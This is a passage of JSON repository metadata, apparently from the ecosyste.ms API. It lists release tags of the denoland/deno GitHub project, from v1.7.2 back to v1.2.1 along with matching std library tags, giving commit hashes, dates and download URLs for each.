i/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit"